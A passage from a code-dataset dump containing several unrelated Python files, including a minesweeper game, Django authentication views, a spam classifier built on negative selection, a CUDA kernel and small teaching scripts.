'uvv'])\n","sub_path":"Finviz-Scraper.py","file_name":"Finviz-Scraper.py","file_ext":"py","file_size_in_byte":5653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"379491843","text":"\r\nn= int(input(\"Enter a number: \"))\r\nsum = 0\r\ntemp = n\r\nwhile temp > 0:\r\n digit = temp % 10\r\n sum += digit ** 3\r\n temp //= 10\r\nif n == sum:\r\n print(\"Armstrong number\")\r\nelse:\r\n print(\"Not Armstrong number\")\r\n","sub_path":"PFSD/p26.py","file_name":"p26.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"16622267","text":"def frzz(x, y):\n out = []\n length_x = len(x)\n length_y = len(y)\n window = length_y\n out.append(x[0])\n for i in range(length_x):\n if i + window <= length_x:\n m = 0\n for j in range(window):\n if j+i < length_x:\n a = x[i+j] * y[j]\n m += a\n out.append(m)\n out.append(y[-1])\n return out\n\n\nx = [1, 2, 3, 4, 5, 6, 7, 8, 9]\ny = [-1, 0, 1]\n\nprint(frzz(x, y))","sub_path":"frzzmul.py","file_name":"frzzmul.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"475216510","text":"# %%\n\"\"\"\nTutorial 8: Pipeline\n====================\n\nTo illustrate lens modeling using an _Inversion_ and _Pipeline_, we'll go back to the complex source model-fit that we\nperformed in tutorial 3 of chapter 3. This time, as you've probably guessed, we'll fit the complex source using an\n_Inversion_.\n\nWe'll begin by modeling the source with a _LightProfile_, to initialize the mass model and avoid the unphysical\nsolutions discussed in tutorial 6. We'll then switch to an _Inversion_.\n\"\"\"\n\n\"\"\" AUTOFIT + CONFIG SETUP \"\"\"\n\n# %%\n#%matplotlib inline\n\nfrom autoconf import conf\nfrom pyprojroot import here\n\nworkspace_path = str(here())\nprint(\"Workspace Path: \", workspace_path)\n\n# %%\n\"\"\"\nUse this path to explicitly set the config path and output path.\n\"\"\"\n\n# %%\nconf.instance = conf.Config(\n config_path=f\"{workspace_path}/howtolens/config\",\n output_path=f\"{workspace_path}/howtolens/output\",\n)\n\n# %%\n\"\"\" AUTOLENS + DATA SETUP \"\"\"\n\n# %%\nimport autofit as af\nimport autolens as al\nimport autolens.plot as aplt\n\n# %%\n\"\"\"\nWe'll use strong lensing data, where:\n\n - The lens galaxy's light is omitted.\n - The lens galaxy's _MassProfile_ is an _EllipticalIsothermal_.\n - The source galaxy's _LightProfile_ is four _EllipticalSersic_'s.\n\"\"\"\n\n# %%\nfrom howtolens.simulators.chapter_4 import lens_sie__source_sersic_x4\n\ndataset_type = \"chapter_4\"\ndataset_name = \"lens_sie__source_sersic_x4\"\ndataset_path = f\"{workspace_path}/howtolens/dataset/{dataset_type}/{dataset_name}\"\n\nimaging = al.Imaging.from_fits(\n image_path=f\"{dataset_path}/image.fits\",\n noise_map_path=f\"{dataset_path}/noise_map.fits\",\n psf_path=f\"{dataset_path}/psf.fits\",\n pixel_scales=0.1,\n)\n\nmask = al.Mask.circular(\n shape_2d=imaging.shape_2d, pixel_scales=imaging.pixel_scales, radius=3.0\n)\n\n\naplt.Imaging.subplot_imaging(imaging=imaging, mask=mask)\n\n# %%\n\"\"\"\n__Settings__\n\nThe *SettingsPhaseImaging* describe how the model is fitted to the data in the log likelihood function. We discussed\nthese in chapter 2, and a full description of all settings can be found in the example script:\n\n 'autolens_workspace/examples/model/customize/settings.py'.\n\nThe settings chosen here are applied to all phases in the pipeline. Note how we can use the _SettingsPixelization_\nobject to determine whether the border is used during the model-fit.\n\"\"\"\n\n# %%\nsettings_masked_imaging = al.SettingsMaskedImaging(sub_size=2)\nsettings_pixelization = al.SettingsPixelization(use_border=True)\n\nsettings = al.SettingsPhaseImaging(\n settings_masked_imaging=settings_masked_imaging,\n settings_pixelization=settings_pixelization,\n)\n\n# %%\n\"\"\"\n__Pipeline_Setup_And_Tagging__:\n\nFor this pipeline the pipeline setup customizes and tags:\n\n - The Pixelization used by the inversion of this pipeline.\n - The Regularization scheme used by of this pipeline.\n - If there is an external shear in the mass model or not.\n\"\"\"\n\n# %%\nsetup = al.SetupPipeline(\n pixelization=al.pix.VoronoiMagnification,\n regularization=al.reg.Constant,\n no_shear=False,\n folders=[\"c4_t8_inversion\"],\n)\n\n# %%\n\"\"\"\n__Pipeline Creation__\n\nTo create a pipeline we import it from the pipelines folder and run its 'make_pipeline' function, inputting the \n*Setup* and *SettingsPhase* above.\n\"\"\"\n\n# %%\nfrom howtolens.chapter_4_inversions import tutorial_8_pipeline\n\npipeline_inversion = tutorial_8_pipeline.make_pipeline(setup=setup, settings=settings)\n\n# Uncomment to run.\n# pipeline_inversion.run(dataset=imaging, mask=mask)\n\n# %%\n\"\"\"\nAnd with that, we now have a pipeline to model strong lenses using an inversion! Checkout the example pipeline in\n'autolens_workspace/pipelines/examples/inversion_hyper_galaxies_bg_noise.py' for an example of an _Inversion_ pipeline \nthat includes the lens light component.\n\"\"\"\n","sub_path":"howtolens/chapter_4_inversions/scripts/tutorial_8_pipeline_runner.py","file_name":"tutorial_8_pipeline_runner.py","file_ext":"py","file_size_in_byte":3741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"44316413","text":"import numpy as np\n\n\ndef update_conway():\n update_func_conway = np.zeros(512, dtype=int)\n for i in range(512):\n conf_state_bin = np.binary_repr(i, width=9)\n conf_state_bin_removed_center = conf_state_bin[0:4] + \\\n conf_state_bin[5:9]\n current_state = int(conf_state_bin[4])\n num_neighbors_alive = sum([int(j)\n for j in conf_state_bin_removed_center])\n\n update_func_conway[i] = current_state # STAY THE SAME BY DEFAULT\n if current_state == 1: # ALIVE\n if num_neighbors_alive < 2 or num_neighbors_alive > 3:\n update_func_conway[i] = 0 # DEAD\n else:\n if num_neighbors_alive == 3:\n update_func_conway[i] = 1 # ALIVE\n\n return update_func_conway\n\n\ndef update_random():\n return np.random.randint(2, size=512)\n","sub_path":"CA_model/special_updates.py","file_name":"special_updates.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"77252128","text":"# Three state machine example ... bad code included.\r\n\r\n# variables\r\ntired = 0\r\nhunger = 0\r\n\r\nstates = ['sleeping','awake','eating']\r\ncurrent_state = 'sleeping'\r\n\r\nalive = True\r\nrunning = True\r\nmax_limit = 100\r\ngame_time = 0\r\n\r\nwhile running and alive:\r\n game_time += 1\r\n\r\n # Sleeping: reduced tired, hunger still increases\r\n if current_state is 'sleeping':\r\n # Do things for this state\r\n print(\"Zzzzzz\")\r\n tired -= 1\r\n hunger += 1\r\n # Check for change state\r\n if tired < 5:\r\n current_state = 'awake'\r\n\r\n # Awake: does nothing interesting. gets hunugry. gets tired\r\n elif current_state is 'awake':\r\n # Do things for this state\r\n print(\"Bored.... BORED! ...\")\r\n tired += 1\r\n hunger += 1\r\n # Check for change state\r\n if hunger > 7:\r\n current_state = 'eating'\r\n if tired > 16:\r\n current_state = 'sleeping'\r\n \r\n # Eating: reduces hunger, still gets tired\r\n elif current_state is 'eating':\r\n # Do things for this state\r\n print(\"Num, num, num...\")\r\n tired += 1\r\n hunger -= 1\r\n # Check for change state\r\n if hunger < 8:\r\n current_state = 'awake'\r\n \r\n # check for broken ... :(\r\n else:\r\n print(\"AH! BROKEN .... how did you get here?\")\r\n die() # not a real function - just breaks things! :)\r\n\r\n if hunger > 20:\r\n alive = False\r\n \r\n # Check for end of game time\r\n if game_time > max_limit:\r\n running = False\r\n\r\nprint('-- The End --')\r\n\r\n\r\n \r\n","sub_path":"FSM.py","file_name":"FSM.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"161651949","text":"import csv\nimport numpy as np\nfrom scipy import misc\nimport os \nfrom random import randint\n\n\n\ndef import_labels():\n #extract the labels from the csv file\n #return as matrix of one hot encoded vectors\n #return 7000 x 9 matrix\n labels = []\n csvfile = open('data/train.csv')\n for row in csvfile:\n #retrieve labels for each image\n try:\n labels.append(int([x.strip() for x in row.split(',')][1]))\n except ValueError:\n continue\n #transform integer values to one_hot encoded vector\n n_values = np.max(labels) + 1\n return np.eye(n_values)[labels], labels\n \ndef load_data():\n #split into train and validation and test\n num_train = 4200\n num_valid = 1400\n num_test = 1400\n\n #load set of training images if already exists\n faces = []\n try:\n faces = np.load('training_set.npz')\n return faces.f.arr_0\n \n except IOError:\n file_names = []\n #get file names\n for filename in os.listdir('data/train'):\n file_names.append(filename)\n #sort file names\n sorted_files = sorted(file_names, key=lambda y: int(y.rsplit('.')[0]))\n \n i = 0\n for file in sorted_files:\n print('reading image ' + str(i))\n face_matrix = misc.imread('data/train/' + file)\n faces.append(face_matrix)\n i += 1\n faces = np.array(faces) \n faces = faces.reshape(faces.shape[0], 3, 128, 128)\n np.savez_compressed('training_set', faces)\n return faces\n \n \ndef load_sets():\n #return the training, valid, and test set\n num_train = 5600\n num_test = 1400\n \n labels, label_ints = import_labels()\n data = load_data()\n #split the data into the \n #8 classes and distribute accordingly\n \n #should distribute classes \n class1 = []\n class2 = []\n class3 = []\n class4 = []\n class5 = []\n class6 = []\n class7 = []\n class8 = []\n \n #store indices of classes in lists\n for i in range(len(label_ints) - 1):\n if i == 1:\n class1.append(i)\n elif i == 2:\n class2.append(i)\n elif i == 3:\n class3.append(i)\n elif i == 4:\n class4.append(i)\n elif i == 5:\n class5.append(i)\n elif i == 6:\n class6.append(i)\n elif i == 7:\n class7.append(i)\n else:\n class8.append(i)\n \n train = data[0:4200]\n val = data[4200:5600]\n test = data[5600:]\n \n train_labels = labels[0:4200]\n val_labels = labels[4200:5600]\n test_labels = labels[5600:]\n \n return (train,train_labels), (val, val_labels), (test, test_labels)\n \n \n \n \n\ndef transform_image(img):\n #transforms an image\n int = randint(0,360)\n \n new_image \n return new_image\n \n \n \n \n ","sub_path":"CnnUtils.py","file_name":"CnnUtils.py","file_ext":"py","file_size_in_byte":2882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"499114418","text":"import random\nimport tkinter as tk\n\nclass MinesweeperTile(object):\n def __init__(self, has_bomb = False, marked = False):\n self.clicked = False\n self.has_bomb = has_bomb\n self.marked = marked\n\n def __str__(self):\n if self.has_bomb:\n return \"X\"\n return \"O\"\n\n def __repr__(self):\n return self.__str__()\n\n\nclass MinesweeperGame(object):\n def __init__(self, x, y, percent_full):\n num_mines = x * y * percent_full / 100.0\n self.board = []\n for i in range(x):\n self.board.append([])\n for j in range(y):\n self.board[i].append(MinesweeperTile())\n\n i = 0\n while i < num_mines:\n x_mine = random.randint(0,x-1)\n y_mine = random.randint(0,y-1)\n if self.board[x_mine][y_mine].has_bomb == False:\n self.board[x_mine][y_mine].has_bomb = True\n i += 1\n\n def get_score(self, x, y):\n if self.board[x][y].has_bomb:\n return -1\n x_min = x - 1 if x > 0 else 0\n y_min = y - 1 if y > 0 else 0\n x_max = x + 1 if x < len(self.board) else len(self.board)\n y_max = y + 1 if y < len(self.board[0]) else len(self.board[0])\n subset = self.board[x_min:x_max+1]\n new_subset = []\n for column in subset:\n new_subset.append(column[y_min:y_max+1])\n subset = []\n for column in new_subset:\n subset += column\n return sum([1 if tile.has_bomb else 0 for tile in subset])\n\n def __repr__(self):\n return self.__str__()\n\n def __str__(self):\n toreturn = \"\"\n for i in range(len(self.board)):\n line = \"\"\n for j in range(len(self.board[0])):\n if self.board[i][j].clicked:\n line += str(self.get_score(i,j)) + \" \"\n elif self.board[i][j].marked:\n line += \"X \"\n else:\n line += \"O \"\n toreturn += line + \"\\n\"\n return toreturn\n\n\nclass MinesweeperGUI(tk.Frame):\n def __init__(self, parent, game):\n tk.Frame.__init__(self, parent) \n self.grid(row=0,column=0)\n self.parent = parent\n self.game = game\n self.initUI()\n \n \n def initUI(self):\n \n self.parent.title(\"Lines\") \n self.btn = [[0 for x in range(len(game.board[0]))] for y in range(len(game.board))] \n\n for x in range(len(game.board)):\n for y in range(len(game.board[0])):\n self.btn[x][y] = tk.Button(self,command= lambda x=x, y=y: self.button_press(x,y))\n self.btn[x][y].bind(\"\", lambda event, arg={\"x\":x, \"y\":y}: self.right_click(event, arg))\n self.btn[x][y].config(height = 1, width = 1)\n self.btn[x][y].grid(column=x, row=y)\n \n self.pack(fill=tk.BOTH, expand=1)\n\n\n def update_button_visibility(self):\n for i in range(len(self.game.board)):\n for j in range(len(self.game.board[0])):\n if self.game.board[i][j].clicked:\n self.btn[i][j].config(text=self.game.get_score(i,j), bg=\"grey\")\n if self.game.board[i][j].marked:\n self.btn[i][j].config(text=\"X\", bg=\"black\")\n\n\n def right_click(self,event,args):\n if self.game.board[args[\"x\"]][args[\"y\"]].marked:\n self.game.board[args[\"x\"]][args[\"y\"]].marked = False\n else:\n self.game.board[args[\"x\"]][args[\"y\"]].marked = True\n self.update_button_visibility()\n\n def button_press(self, x, y):\n if self.game.board[x][y].has_bomb:\n self.btn[x][y].config(bg=\"red\")\n self.parent.title(\"Game Over\")\n else:\n self.expand_click(x,y)\n self.update_button_visibility()\n\n\n def expand_click(self, x, y):\n if self.game.get_score(x, y) == 0 and not self.game.board[x][y].clicked and not self.game.board[x][y].has_bomb:\n self.game.board[x][y].clicked = True\n if x > 0:\n self.expand_click(x-1, y)\n if x < len(self.game.board)-1:\n self.expand_click(x+1, y)\n if y > 0:\n self.expand_click(x, y-1)\n if y < len(self.game.board[0])-1:\n self.expand_click(x, y+1)\n if x > 0 and y > 0:\n self.expand_click(x-1,y-1)\n if x > 0 and y < len(self.game.board[0]) - 1:\n self.expand_click(x-1,y+1)\n if x < len(self.game.board) - 1 and y > 0:\n self.expand_click(x+1, y-1)\n if x < len(self.game.board) - 1 and y < len(self.game.board[0]) - 1:\n self.expand_click(x+1, y+1)\n\n self.game.board[x][y].clicked = True\n \n\n\n\n\n\n\ngame = MinesweeperGame(30,30,10)\n\nroot = tk.Tk()\napp = MinesweeperGUI(root, game)\napp.mainloop()","sub_path":"minesweeper.py","file_name":"minesweeper.py","file_ext":"py","file_size_in_byte":4911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"539185055","text":"from django.shortcuts import render, HttpResponseRedirect\nfrom django.contrib import auth\nfrom django.urls import reverse, reverse_lazy\nfrom .forms import ShopUserLoginForm, ShopUserRegisterForm, ShopUserEditForm, ShopUserProfileEditForm\nfrom django.views.generic.edit import UpdateView\nfrom .models import ShopUser\nfrom django.core.mail import send_mail\nfrom django.conf import settings\nfrom django.db import transaction\nfrom django.contrib.auth.decorators import login_required\n\n\ndef login(request):\n title = 'вход'\n\n login_form = ShopUserLoginForm(data=request.POST or None)\n if request.method == 'POST' and login_form.is_valid():\n username = request.POST['username']\n password = request.POST['password']\n next = request.POST.get('next')\n\n user = auth.authenticate(username=username, password=password)\n if user and user.is_active:\n auth.login(request, user)\n if next:\n return HttpResponseRedirect(next)\n else:\n return HttpResponseRedirect(reverse('main'))\n next = request.GET.get('next')\n\n content = {'title': title, 'login_form': login_form, 'next': next}\n return render(request, 'authapp/login.html', content)\n\n\ndef logout(request):\n auth.logout(request)\n return HttpResponseRedirect(reverse('main'))\n\n\ndef register(request):\n title = 'регистрация'\n\n if request.method == 'POST':\n register_form = ShopUserRegisterForm(data=request.POST, files=request.FILES)\n\n if register_form.is_valid():\n user = register_form.save()\n if send_verify_mail(user):\n print(\"Сообщение для активации пользователя отправлено на почту\")\n return HttpResponseRedirect(reverse('auth:login'))\n # auth.login(request, user)\n # return HttpResponseRedirect(reverse('main'))\n else:\n print(\"Ошибка отправки сообщения!\")\n return HttpResponseRedirect(reverse('auth:login'))\n else:\n register_form = ShopUserRegisterForm()\n\n content = {'title': title, 'register_form': register_form}\n\n return render(request, 'authapp/register.html', content)\n\n\nclass EditView(UpdateView):\n model = ShopUser\n template_name = 'authapp/register.html'\n fields = 'username', 'email', 'avatar'\n success_url = reverse_lazy('main')\n\n def get_context_data(self, **kwargs):\n context = super(EditView, self).get_context_data(**kwargs)\n context['title'] = 'Редактирование профиля'\n context['submit_label'] = 'Применить'\n return context\n\n\n@login_required\n@transaction.atomic\ndef edit(request):\n title = 'редактирование'\n\n if request.method == 'POST':\n edit_form = ShopUserEditForm(request.POST, request.FILES, instance=request.user)\n profile_form = ShopUserEditForm(request.POST, instance=request.user.shopuserprofile)\n if edit_form.is_valid() and profile_form.is_valid():\n edit_form.save()\n return HttpResponseRedirect(reverse('auth:edit'))\n else:\n edit_form = ShopUserEditForm(instance=request.user)\n profile_form = ShopUserProfileEditForm(instance=request.user.shopuserprofile)\n\n content = {'title': title, 'edit_form': edit_form, 'profile_form': profile_form}\n\n return render(request, 'authapp/edit.html', content)\n\n\n# def send_verify_mail(user):\n# verify_link = reverse('auth:verify', args=[user.email, user.activation_key])\n#\n# title = f'Подтверждение учетной записи {user.username}'\n#\n# message = f'Для подтверждения учетной записи {user.username} на портале {settings.DOMAIN_NAME} перейдите по ссылке: \\n{settings.DOMAIN_NAME}{verify_link}'\n#\n# print(f'from: {settings.EMAIL_HOST_USER}, to: {user.email}')\n# return send_mail(title, message, settings.EMAIL_HOST_USER, [user.email], fail_silently=False)\n\n\ndef send_verify_mail(user):\n verify_link = reverse(\n 'auth:verify',\n args=[user.email, user.activation_key])\n\n title = 'Подтверждение учетной записи {0}'.format(user.username)\n message = 'Для подтверждения учетной записи {0} \\\n на портале {1} перейдите по ссылке: \\\n \\n{2}{3}'.format(user.username, settings.DOMAIN_NAME, settings.DOMAIN_NAME, verify_link)\n\n print('from: {0}, to: {1}'.format(settings.EMAIL_HOST_USER, user.email))\n return send_mail(\n title,\n message,\n settings.EMAIL_HOST_USER,\n [user.email],\n fail_silently=False,\n )\n\n\ndef verify(request, email, activation_key):\n try:\n user = ShopUser.objects.get(email=email)\n context = {\"email\": email}\n if user.activation_key == activation_key and not user.is_activation_key_expired():\n print(f'user {user} is activated')\n user.is_active = True\n user.save()\n # backend='django.contrib.auth.backends.ModelBackend'\n auth.login(request, user, backend='django.contrib.auth.backends.ModelBackend')\n\n return render(request, 'authapp/verification_ok.html', context)\n else:\n print(f'error activation user: {user}')\n return render(request, 'authapp/verification_error.html', context)\n except Exception as e:\n print(f'error activation user: {e.args}')\n\n return HttpResponseRedirect(reverse('main'))\n\n","sub_path":"authapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"123177799","text":"import random\n\nfrom sklearn.model_selection import train_test_split\nfrom utils import plot_confusion_matrix\nfrom trie import Trie\nfrom datasets import load_sms, load_enron\nfrom sklearn.metrics import classification_report, accuracy_score, confusion_matrix, f1_score\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef count_anomalies(trie, string, r):\n \"\"\"\n Slides window of size r across string and counts 1\n for each time the substring (of size r) was not found in the trie\n :param trie: Trie that represents the set of self strings\n :param string: The string to be detected by the trie\n :param r: Window size\n :return: Amount of times the substring was not found in the trie, i.e. anomalous substring count\n \"\"\"\n count = 0\n for i in range(len(string)-r+1):\n if not trie.find(string[i:i+r]):\n count += 1\n return count\n\n\ndef predict(trie, X_test, r, confidence_threshold=0.5):\n \"\"\"\n Takes a self-recognizing trie and a set of strings to classify\n :param trie: Self-recognizing trie built by build_self_trie()\n :param X_test: Set of strings to be classified\n :param r: Substring size\n :param confidence_threshold: Threshold at which to decide a sample is anomalous/self. Skewing this gives more bias\n to either class\n :return: List of hard predictions (0, 1) and actual probabilities per sample from X_test\n \"\"\"\n y_pred = []\n y_probs = []\n\n for string in X_test:\n anomaly_count = count_anomalies(trie, string, r)\n # The probability that the string does not belong to self is the amount of times its substring (of size r)\n # was not detected in the trie that represents self, divided by the total amount of substrings (of size r)\n prob = anomaly_count / (len(string)-r+1) if len(string) > r else 0\n y_probs.append(prob)\n y_pred.append(prob > confidence_threshold)\n\n return [y_pred, y_probs]\n\n\ndef build_self_trie(X, y, r, train_size=0.667, random_state=None):\n \"\"\"\n Splits X and y in train and test sets. Builds a self recognizing repertoire in the form of a trie, containing\n all substrings of size r.\n :param X: All documents\n :param y: All labels\n :param r: Substring size\n :param train_size: Fraction of self-samples that are used to build the self-trie\n :param random_state: Random seed for reproducibility\n :return: self-recognizing trie, test data containing self and non-self, test labels\n \"\"\"\n if random_state is not None:\n random.seed(random_state)\n\n X_train = ''\n X_test = []\n y_test = []\n\n for doc, label in zip(X, y):\n if len(doc) >= r: # Make sure doc contains at least one substring of length r\n doc = doc.strip() # Strip each doc of leading and trailing whitespaces\n if int(label) == 0: # Samples labeled 0/False are considered to be part of the self-space\n if random.random() > train_size: # Only append some self samples to the test set\n X_test.append(doc)\n y_test.append(label)\n else:\n # Gather all train data as one big concatenated string to maintain as much data of the self set\n # as possible. If we were to build a trie of substring size r document by document we risk losing\n # the last few letters of every sample. If we concatenate everything first and build the trie\n # from this, we only risk losing the very end of the last sample\n X_train += doc\n else: # Append each non-self sample to the test set\n X_test.append(doc)\n y_test.append(label)\n\n # Build self-trie from chunks of size r\n self_trie = Trie()\n for i in range(len(X_train)-r+1):\n self_trie.insert(X_train[i:i+r])\n\n return [self_trie, X_test, y_test]\n\n\nif __name__ == '__main__':\n \"\"\"\n Example usage of negative selection\n \"\"\"\n # Choose data set below by enabling the lines that load the desired set and desired plot title name\n documents, labels, target_names = load_sms()\n plt_title = 'SMS Spam Collection'\n # documents, labels, target_names = load_enron()\n # plt_title = 'Enron v1'\n # documents, labels, target_names = load_enron(version=6)\n # plt_title = 'Enron v6'\n X_train, X_test, y_train, y_test = train_test_split(documents, labels,\n test_size=0.5, random_state=42, shuffle=True, stratify=labels)\n\n # Plot accuracy for different values of r\n all_r = list(range(2, 15))\n all_acc = []\n all_f1 = []\n all_cnf = []\n for r in all_r:\n data_trie, data_test, label_test = build_self_trie(X_train, y_train, r, train_size=1)\n predicted, _ = predict(data_trie, X_test, r)\n print(classification_report(y_test, predicted, target_names=target_names))\n print('Accuracy: {:.3f}'.format(accuracy_score(y_test, predicted)))\n print('F1: {:.3f}'.format(f1_score(y_test, predicted)))\n print('Confusion matrix:\\n{}'.format(confusion_matrix(y_test, predicted)))\n all_acc.append(accuracy_score(y_test, predicted))\n all_f1.append(f1_score(y_test, predicted))\n all_cnf.append(confusion_matrix(y_test, predicted))\n plt.figure()\n plt.ylabel('Scores')\n plt.xlabel('r')\n plt.title(plt_title)\n plt.plot(all_r, all_acc, label='Accuracy')\n plt.plot(all_r, all_f1, label='F1')\n print('Max acc at r={}, max f1 at r={}'.format(all_r[np.argmax(all_acc)], all_r[np.argmax(all_f1)]))\n plt.legend()\n plt.figure()\n plot_confusion_matrix(all_cnf[all_acc.index(max(all_acc))], classes=target_names, title=plt_title)\n plt.show()\n","sub_path":"negative_selection/negsel.py","file_name":"negsel.py","file_ext":"py","file_size_in_byte":5729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"499454947","text":"import os\r\nimport pandas as pd\r\nimport csv\r\n\r\nfeatures_folder = os.path.join(os.getcwd(),'Results', 'features', 'monthly_features_full2')\r\noutput_folder = os.path.join(os.getcwd(),'Results', 'features')\r\nflag = True\r\nwith open(os.path.join(output_folder, 'filtered_all_features_nonspam.out'), 'w', encoding='latin-1') as g:\r\n c = csv.writer(g)\r\n for subdir, dirs, files in os.walk(features_folder):\r\n for filename in files:\r\n print(filename)\r\n try:\r\n with open(os.path.join(subdir, filename), 'r', encoding='latin-1') as f:\r\n lines = f.readlines()\r\n if flag:\r\n c.writerow(lines[0].strip().split(\",\"))\r\n flag = False\r\n for i in range(1,11):\r\n c.writerow(lines[i].strip().split(\",\"))\r\n except OSError:\r\n pass","sub_path":"generate_top_10_non_spam_features.py","file_name":"generate_top_10_non_spam_features.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"179552096","text":"import torch\n\nfrom ....utils.cuda import (cuda_num_threads, Stream, Dtype, load_kernel,\n kernel_loop, get_blocks)\n\nkernel = kernel_loop + \"\"\"\nextern \"C\"\n__global__ void scatter_arg_max(\nconst ${Dtype}* input, const long* cluster, const ${Dtype}* max,\nlong* argmax) {\n\n CUDA_KERNEL_LOOP(idx, ${num_threads}) {\n\n const int n_idx = idx / ${M};\n const int m_idx = idx % ${M};\n\n int c = cluster[n_idx] * ${M} + m_idx;\n\n ${Dtype} f = input[idx];\n ${Dtype} m = max[c];\n\n if (f == m) argmax[c] = n_idx;\n }\n}\n\"\"\"\n\n\ndef scatter_arg_max_gpu(input, cluster, max):\n with torch.cuda.device_of(input):\n K, M = max.size()\n argmax = torch.cuda.LongTensor(K, M)\n num_threads = input.numel()\n f = load_kernel(\n 'scatter_arg_max',\n kernel,\n Dtype=Dtype(input),\n num_threads=num_threads,\n M=M)\n f(args=[\n input.data_ptr(),\n cluster.data_ptr(),\n max.data_ptr(),\n argmax.data_ptr()\n ],\n block=(cuda_num_threads, 1, 1),\n grid=(get_blocks(num_threads), 1, 1),\n stream=Stream(ptr=torch.cuda.current_stream().cuda_stream))\n\n return argmax\n","sub_path":"torch_geometric/nn/functional/max_pool_voxel/scatter_arg_max_gpu.py","file_name":"scatter_arg_max_gpu.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"632978543","text":"# --------------\n# import packages\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport datetime\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n# Load the dataset\n\ndf = pd.read_csv(path,sep='\\t')\nprint(df.shape)\n# Converting date attribute from string to datetime.date datatype \nprint(df['date'].dtype)\ndf['date'] = df['date'].astype(datetime.date)\n\n# calculate the total length of word\ndf['length'] = df['verified_reviews'].str.len()\n\n\n\n\n# --------------\n# set figure size\n\nplt.figure(figsize=(10,6))\n\n# generate countplot\nsns.countplot(x='rating',hue='feedback',data=df)\n\n# display plot\nplt.show()\n\n## Product rating vs feedback\n\n# set figure size\nplt.figure(figsize=(10,6))\n\n# generate barplot\nsns.barplot(x='rating',hue='feedback',y='variation',data=df)\n\n# display plot\nplt.show()\n\n\n\n# --------------\n# import packages\nimport re\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.stem.porter import PorterStemmer\n\n# declare empty list 'corpus'\n\ncorpus=[]\n\n# for loop to fill in corpus\nfor i in range(3150):\n # retain alphabets\n review = re.findall(r'\\w+',df.loc[i,'verified_reviews'])\n # convert to lower case\n review = [txt.lower() for txt in review]\n # tokenize # initialize stemmer object\n ps = PorterStemmer()\n # perform stemming\n stop_words=set(stopwords.words('english'))\n review = [ps.stem(i) for i in review if i not in stop_words]\n # join elements of list\n review = ' '.join(review)\n # add to 'corpus'\n corpus.append(review)\n# display 'corpus'\nprint(corpus)\n\n\n\n# --------------\n# import libraries\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.model_selection import train_test_split\n\n\n# Instantiate count vectorizer\ncv = CountVectorizer(max_features=1500)\n\n# Independent variable\nX = cv.fit_transform(corpus)\n\n# dependent variable\ny = df.feedback\n\n# Counts\ncount = y.value_counts()\n\n# Split the dataset\nX_train,X_test,y_train,y_test = train_test_split(X,y,test_size=0.2,random_state=0)\n\n\n\n# --------------\n# import packages\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import accuracy_score, precision_score, recall_score, confusion_matrix, f1_score\n\n# Instantiate calssifier\nrf = RandomForestClassifier(random_state=2)\n\n# fit model on training data\nrf.fit(X_train,y_train)\n\n# predict on test data\ny_pred = rf.predict(X_test) \n\n# calculate the accuracy score\nscore = accuracy_score(y_test,y_pred)\n\n# calculate the precision\nprecision = precision_score(y_test,y_pred)\n\n\n# --------------\n# import packages\nfrom imblearn.over_sampling import SMOTE\n\n# Instantiate smote\nsmote = SMOTE(random_state=9)\n\n# fit_sample onm training data\nX_train, y_train = smote.fit_sample(X_train, y_train)\n\n# fit modelk on training data\nrf.fit(X_train, y_train)\n\n# predict on test data\ny_pred = rf.predict(X_test)\n\n# calculate the accuracy score\nscore = accuracy_score(y_test, y_pred)\n\n# calculate the precision\nprecision = precision_score(y_test, y_pred)\n\n# display precision and score\nprint(score, precision)\n\n\n","sub_path":"SENTIMENT-ANALYSIS/Amazon-Alexa-Reviews/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":3055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"453106695","text":"import os, sys\n\nsys.path.insert(0,\"/home1/dtw777/public_html\")\n\nos.environ['DJANGO_SETTINGS_MODULE'] = 'web.settings'\nos.environ['PYTHON_EGG_CACHE'] = '/home1/dtw777/.python_egg_cache'\n\n#from django.core.wsgi import get_wsgi_application\n#application = get_wsgi_application()\n\ndef application(environ, start_response):\n \"\"\"Simplest possible application object\"\"\"\n output = \"Hello World\"\n status = '200 OK'\n response_headers = [('Content-type', 'text/plain'), ('Content-Length', str(len(output)))]\n start_response(status, response_headers)\n return [output] ","sub_path":"conf/dispatch.wsgi","file_name":"dispatch.wsgi","file_ext":"wsgi","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"51405559","text":"import sys\nimport math\nimport subprocess\nimport os\nimport shutil\n\nDIR_SCRIPT = 